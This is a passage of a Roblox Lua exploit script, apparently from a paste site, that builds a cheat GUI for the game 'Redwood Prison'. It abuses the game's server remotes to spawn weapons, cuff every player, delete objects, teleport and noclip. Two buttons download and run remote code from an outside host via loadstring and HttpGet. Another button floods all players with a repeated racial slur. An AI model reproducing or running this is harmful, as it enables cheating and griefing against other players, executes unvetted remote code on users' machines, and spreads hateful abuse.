  696. open.Font = Enum.Font.SourceSansSemibold
  697. open.FontSize = Enum.FontSize.Size24
  698. open.Text = "Open"
  699. open.TextColor3 = Color3.new(1, 1, 1)
  700. open.TextSize = 20
  701.  
  702. open.Visible = true
  703. open:TweenPosition(UDim2.new(0, 0,0.675, 0), "InOut", "Quart", 0.7, true, nil)
  704. main.Draggable = true
  705.  
  706. open.MouseButton1Click:connect(function()
  707. main.Visible = true
  708. open:TweenPosition(UDim2.new(-0.285, 0,0.675, 0), "InOut", "Quart", 0.7, true, nil)
  709. main:TweenPosition(UDim2.new(0.354, 0,0.209, 0), "InOut", "Quart", 0.9, true, nil)
  710. wait(0.5)
  711. open.Visible = false
  712. end)
  713.  
  714. close.MouseButton1Click:connect(function()
  715. main:TweenPosition(UDim2.new(-0.285, 0,0.28, 0), "InOut", "Quart", 0.7, true, nil)
  716. open.Visible = true
  717. open:TweenPosition(UDim2.new(0, 0,0.675, 0), "InOut", "Quart", 0.7, true, nil)
  718. wait(0.7)
  719. main.Visible = false
  720. end)
  721.  
  722. arrest.MouseButton1Click:connect(function()
  723. local Player = game.Players.LocalPlayer
  724. wait(0.5)
  725. for i,v in pairs(game.Teams.Fugitives:GetPlayers()) do
  726. repeat
  727. wait()
  728. Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 1)
  729. until v.Team.Name ~= "Fugitives"
  730. end
  731. end)
  732.  
  733. reload.MouseButton1Click:connect(function()
  734. loadstring(Game:HttpGet('https://ixss.keybase.pub/rblx/Redwood%20building.txt', true))()
  735. end)
  736.  
  737. guns.MouseButton1Click:connect(function()
  738. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M60")
  739. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M98B")
  740. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "UMP-45")
  741. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M14")
  742. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "ACR")
  743. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Revolver")
  744. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "AK47-U")
  745. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "L86A2")
  746. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "S&W 638")
  747. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "SPAS-12")
  748. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M16")
  749. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Beretta M9")
  750. end)
  751.  
  752. id.MouseButton1Click:connect(function()
  753. loadstring(Game:HttpGet('https://ixss.keybase.pub/rblx/GUI.txt', true))()
  754. end)
  755.  
  756. para.MouseButton1Click:connect(function()
  757. for i=1, 9999999999999 do
  758. wait(0.00001)
  759. local A_1 = "FireAllClients"
  760. local A_2 = "smallNotice"
  761. local A_3 = "nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger "
  762. local A_4 = true
  763. local Event = game:GetService("Workspace").resources.RemoteEvent
  764. Event:FireServer(A_1, A_2, A_3, A_4)
  765. local A_1 = "FireAllClients"
  766. local A_2 = "showNotice"
  767. local A_3 = "nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger "
  768. local A_4 = "nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger nigger "
  769. local Event = game:GetService("Workspace").resources.RemoteEvent
  770. Event:FireServer(A_1, A_2, A_3, A_4)
  771. end
  772. end)
  773.  
  774. cops.MouseButton1Click:connect(function()
  775. local pPos2 = game.Players.LocalPlayer.Character.HumanoidRootPart
  776. pPos2.CFrame = CFrame.new(Vector3.new(92, 4, -10))
  777. end)
  778.  
  779. fug.MouseButton1Click:connect(function()
  780. local pPos2 = game.Players.LocalPlayer.Character.HumanoidRootPart
  781. pPos2.CFrame = CFrame.new(Vector3.new(-613, -24, -333))
  782. end)
  783.  
  784. pris.MouseButton1Click:connect(function()
  785. local pPos2 = game.Players.LocalPlayer.Character.HumanoidRootPart
  786. pPos2.CFrame = CFrame.new(Vector3.new(-4, 4, 18))
  787. end)
  788.  
  789. teleports.MouseButton1Click:connect(function()
  790. miscframe.Visible = false
  791. giversframe.Visible = false
  792. homeframe.Visible = false
  793. teleportsframe.Visible = true
  794. gungiver.Visible = false
  795. end)
  796.  
  797. misc.MouseButton1Click:connect(function()
  798. giversframe.Visible = false
  799. teleportsframe.Visible = false
  800. homeframe.Visible = false
  801. miscframe.Visible = true
  802. gungiver.Visible = false
  803. end)
  804.  
  805. givers.MouseButton1Click:connect(function()
  806. miscframe.Visible = false
  807. teleportsframe.Visible = false
  808. homeframe.Visible = false
  809. giversframe.Visible = true
  810. gungiver.Visible = false
  811. end)
  812.  
  813. taser.MouseButton1Click:connect(function()
  814. local tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  815. tool.RequiresHandle = false
  816. tool.Name = "Bridge"
  817. tool.CanBeDropped = false
  818.  
  819. local pos1 = nil
  820. local pos2 = nil
  821. local bridgesize = 10
  822. local mouse = game.Players.LocalPlayer:GetMouse()
  823. local isEquipped = false
  824. local isSettingPos = false
  825. local bridgeEnabled = false
  826. local dist = 0
  827.  
  828. function asdf(origin, target, properties)
  829. game.Workspace.resources.RemoteEvent:FireServer("FireAllClients","drawLaser", origin, target, properties)
  830. end
  831.  
  832. mouse.KeyDown:Connect(function(k)
  833. if not isEquipped then return end
  834. key = k:lower()
  835. if key == "e" then
  836. if bridgesize <= 5 then return end
  837. bridgesize = bridgesize - 1
  838. game:GetService("StarterGui"):SetCore("SendNotification", {
  839. Title = "Information";
  840. Text = "New size: " .. bridgesize;
  841. })
  842. print(bridgesize)
  843. end
  844. if key == "r" then
  845. if bridgesize >= 25 then return end
  846. bridgesize = bridgesize + 1
  847. game:GetService("StarterGui"):SetCore("SendNotification", {
  848. Title = "Information";
  849. Text = "New size: " .. bridgesize;
  850. })
  851. print(bridgesize)
  852. end
  853. if key == "t" then
  854. bridgeEnabled = false
  855. isSettingPos = false
  856. pos1 = nil
  857. pos2 = nil
  858. bridgesize = 10
  859. game:GetService("StarterGui"):SetCore("SendNotification", {
  860. Title = "Information";
  861. Text = "Values reset to default.";
  862. })
  863. end
  864. end)
  865.  
  866.  
  867. tool.Equipped:Connect(function()
  868. isEquipped = true
  869. game:GetService("StarterGui"):SetCore("SendNotification", {
  870. Title = "Information";
  871. Text = "Click to set positions, Press R to increase width, E to decrease width and Press T to reset.";
  872. })
  873. end)
  874.  
  875. tool.Unequipped:Connect(function()
  876. isEquipped = false
  877. end)
  878.  
  879.  
  880.  
  881. tool.Activated:Connect(function()
  882. if not isSettingPos then
  883. pos1 = mouse.hit
  884. game:GetService("StarterGui"):SetCore("SendNotification", {
  885. Title = "Information";
  886. Text = "Position 1 saved, click again for position 2.";
  887. })
  888. isSettingPos = true
  889. else
  890. pos2 = mouse.hit
  891. game:GetService("StarterGui"):SetCore("SendNotification", {
  892. Title = "Information";
  893. Text = "Position 2 saved, creating bridge...";
  894. })
  895. isSettingPos = false
  896. bridgeEnabled = true
  897. dist = (pos1.p-pos2.p).magnitude
  898. end
  899. end)
  900.  
  901. while true do
  902. wait(.1)
  903. if bridgeEnabled then
  904. asdf(pos1.p, pos2.p, {
  905. ["CanCollide"] = true,
  906. ["Size"] = Vector3.new(bridgesize, 1, dist),
  907. ["CFrame"] = CFrame.new(pos1.p, pos2.p) * CFrame.new(0,0, -dist/2) * CFrame.Angles(0,0,0),
  908. })
  909. end
  910. end
  911. end)
  912.  
  913. ammo.MouseButton1Click:connect(function()
  914. while true do
  915. wait(.15)
  916. local pPos = game.Players.LocalPlayer.Character.Torso.Position
  917. local ammoCrate = workspace.ammoCrate
  918. ammoCrate.CanCollide = false
  919. ammoCrate.Transparency = 1
  920. ammoCrate:ClearAllChildren()
  921. ammoCrate.Position = pPos
  922. end
  923. end)
  924.  
  925. home.MouseButton1Click:connect(function()
  926. miscframe.Visible = false
  927. teleportsframe.Visible = false
  928. giversframe.Visible = false
  929. homeframe.Visible = true
  930. gungiver.Visible = false
  931. end)
  932.  
  933. changews.MouseButton1Click:connect(function()
  934. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = walk.Text
  935. walk.Text = WalkSpeed
  936. end)
  937.  
  938. btools.MouseButton1Click:connect(function()
  939. local btool = Instance.new("Tool",game.Players.LocalPlayer.Backpack)
  940. local SelectionBox = Instance.new("SelectionBox",game.Workspace)
  941. SelectionBox.Name = "oof"
  942. SelectionBox.LineThickness = 0.05
  943. SelectionBox.Adornee = nil
  944. SelectionBox.Color3 = Color3.fromRGB(0,0,255)
  945. SelectionBox.Visible = false
  946. btool.Name = "Delete Tool"
  947. btool.RequiresHandle = false
  948. local IsEquipped = false
  949. local Mouse = game.Players.LocalPlayer:GetMouse()
  950.  
  951. btool.Equipped:connect(function()
  952. IsEquipped = true
  953. SelectionBox.Visible = true
  954. SelectionBox.Adornee = nil
  955. end)
  956.  
  957. btool.Unequipped:connect(function()
  958. IsEquipped = false
  959. SelectionBox.Visible = false
  960. SelectionBox.Adornee = nil
  961. end)
  962.  
  963.  
  964. btool.Activated:connect(function()
  965. if IsEquipped then
  966. game.Workspace.resources.RemoteEvent:FireServer("toggleShield", Mouse.Target)
  967. end
  968. end)
  969.  
  970. while true do
  971. SelectionBox.Adornee = Mouse.Target or nil
  972. wait(0.1)
  973. end
  974. ------:Arrest All:
  975. local A_1 = "requestTeam"
  976. local A_2 = "prisoners"
  977. local Event = game:GetService("Workspace").resources.RemoteFunction
  978. Event:InvokeServer(A_1, A_2)
  979. for _, v in pairs(game.Players:GetChildren()) do
  980. game.Workspace.resources.RemoteEvent:FireServer("cuff", v)
  981. end
  982. wait(2)
  983. game.Workspace.resources.RemoteFunction:InvokeServer("requestTeam", "police")
  984. for _, v in pairs(game.Players:GetChildren()) do
  985. game.Workspace.resources.RemoteEvent:FireServer("cuff", v)
  986. end
  987. end)
  988.  
  989. des.MouseButton1Click:connect(function()
  990. game.CoreGui.RedwoodPrisonGUI:Destroy()
  991. end)
  992.  
  993. changejp.MouseButton1Click:connect(function()
  994. game.Players.LocalPlayer.Character.Humanoid.JumpPower = jump.Text
  995. jump.Text = JumpPower
  996. end)
  997.  
  998. noclipenabled = false
  999. game:GetService('RunService').Stepped:connect(function()
  1000. if noclipenabled then
  1001. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  1002. end
  1003. end)
  1004. noclip.MouseButton1Down:connect(function()
  1005. noclipenabled = not noclipenabled
  1006. if noclip.Text == "Disable NoClip" then
  1007. noclip.Text = "Enable NoClip"
  1008. else
  1009. noclip.Text = "Disable NoClip"
  1010. end
  1011. end)
  1012.  
  1013. giver.MouseButton1Click:connect(function()
  1014. gungiver.Visible = true
  1015. giversframe.Visible = false
  1016. end)
  1017.  
  1018. back.MouseButton1Click:connect(function()
  1019. gungiver.Visible = false
  1020. giversframe.Visible = true
  1021. end)
  1022.  
  1023. acr.MouseButton1Click:connect(function()
  1024. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "ACR")
  1025. end)
  1026.  
  1027. aku.MouseButton1Click:connect(function()
  1028. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "AK47-U")
  1029. end)
  1030.  
  1031. m60.MouseButton1Click:connect(function()
  1032. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M60")
  1033. end)
  1034.  
  1035. m16.MouseButton1Click:connect(function()
  1036. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M16")
  1037. end)
  1038.  
  1039. m14.MouseButton1Click:connect(function()
  1040. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M14")
  1041. end)
  1042.  
  1043. ump.MouseButton1Click:connect(function()
  1044. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "UMP-45")
  1045. end)
  1046.  
  1047. m98b.MouseButton1Click:connect(function()
  1048. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "M98B")
  1049. end)
  1050.  
  1051. ber.MouseButton1Click:connect(function()
  1052. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Fake ID Card")
  1053. end)
  1054.  
  1055. l86.MouseButton1Click:connect(function()
  1056. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "L86A2")
  1057. end)
  1058.  
  1059. revo.MouseButton1Click:connect(function()
  1060. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Revolver")
  1061. end)
  1062.  
  1063. saw.MouseButton1Click:connect(function()
  1064. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "S&W 638")
  1065. end)
  1066.  
  1067. spas.MouseButton1Click:connect(function()
  1068. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "SPAS-12")
  1069. end)
  1070.  
  1071. hammer.MouseButton1Click:connect(function()
  1072. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Hammer")
  1073. game.Workspace.resources.RemoteFunction:InvokeServer("giveItem", "Shank")
  1074. end)
  1075.  
  1076. tp.MouseButton1Click:connect(function()
  1077. local LP = game.Players.LocalPlayer.Character.HumanoidRootPart
  1078. local Person = game.Players[player.Text].Character.HumanoidRootPart
  1079. LP.CFrame = CFrame.new(Person.Position.X, Person.Position.Y, Person.Position.Z)
  1080. end)
  1081.  
  1082. game.StarterGui:SetCore('SendNotification', {Title='Welcome'; Text='Welcome To Redwood Prison GUI, ' .. localplay.Name ..'!', Duration=5;});
Add Comment
Please, Sign In to add comment